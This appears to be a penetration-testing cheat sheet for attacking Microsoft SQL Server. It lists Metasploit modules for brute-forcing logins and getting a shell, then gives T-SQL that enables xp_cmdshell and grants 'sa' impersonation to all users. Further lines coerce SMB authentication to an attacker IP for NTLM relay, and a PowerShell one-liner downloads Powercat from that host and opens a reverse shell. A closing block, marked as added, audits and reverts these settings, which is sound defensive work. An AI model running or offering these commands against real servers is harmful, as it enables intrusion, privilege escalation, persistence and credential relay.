Useful Metasploit modules

Metasploit MS SQL modules

Metasploit provides a lot of tools for enumerating and exploiting MS SQL.

  • auxiliary/scanner/mssql/mssql_ping — Discover MS SQL servers (alternatively, use --script=ms-sql-info with Nmap)
  • auxiliary/scanner/mssql/mssql_login — Brute force logins
  • auxiliary/admin/mssql/mssql_enum — Enumerate databases
  • exploit/windows/mssql/mssql_payload — Get a shell

xp_cmdshell

MS SQL includes the xp_cmdshell “extended” procedure, which allows a shell command to be called. This is disabled by default, but if enabled it can be used in a trigger to provide persistence on database activity. Powercat, a re-implementation of netcat in pure PowerShell, is useful here.

-- Enable MS SQL "advanced options"
--
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
 
-- Enable xp_cmdshell stored procedure
--
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
 
-- OPTIONAL: Allow all users to impersonate the "sa" (database
-- administrator) user (this enables low-privilege website users
-- to run xp_cmdshell)
--
USE master;
GRANT impersonate ON login::sa TO [public];
 
-- Coerce MS SQL into connecting over SMB to an attacker at
-- 1.2.3.4. Useful for NTLM relay attacks (if SMB signing isn't
-- turned on, that is).
--
EXEC master.sys.xp_dirtree '\\1.2.3.4\share',1,1;
 
-- Download and execute Powercat from an attacker at 1.2.3.4
-- (using the built-in Python web server) and connect back to
-- that IP on port 1337. Note that this in general should be
-- caught by IDS/IDP systems, including Defender... But I've
-- actually had it work for me out-of-the-box a surprising
-- number of times.
--
EXEC master.sys.xp_cmdshell 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString(''http://1.2.3.4:8000/powercat.ps1''); powercat -c 1.2.3.4 -p 1337 -e cmd.exe"'
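For the defensive side of the same three changes, here is an added T-SQL audit (not part of the original notes) that checks whether an instance has 'show advanced options' or xp_cmdshell enabled, or IMPERSONATE granted on a login to public, and then reverts them. It assumes a sysadmin connection and the standard catalog views available on SQL Server 2008 and later.

```sql
-- Added defender-side audit; not from the original notes. Run as sysadmin.
-- Assumes SQL Server 2008+ (sys.configurations, sys.server_permissions
-- and sys.server_principals are standard catalog views).

-- 1. Are 'show advanced options' or xp_cmdshell enabled?
--    value_in_use = 1 means enabled; the hardened state is 0 for both.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Who can impersonate which login? A row granting IMPERSONATE on sa
--    (or any sysadmin login) to [public] is the backdoor from the notes.
SELECT grantee.name  AS grantee,
       target.name   AS impersonated_login,
       p.state_desc,
       p.permission_name
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee
  ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target
  ON target.principal_id = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- 3. Revert: disable xp_cmdshell, hide advanced options again, and strip
--    the impersonation grant if step 2 reported it.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
USE master;
REVOKE IMPERSONATE ON LOGIN::sa FROM [public];
```

Re-run steps 1 and 2 after the revert to confirm both queries come back clean; a grant that reappears points at a trigger or job re-enabling it, which is the persistence pattern the notes describe.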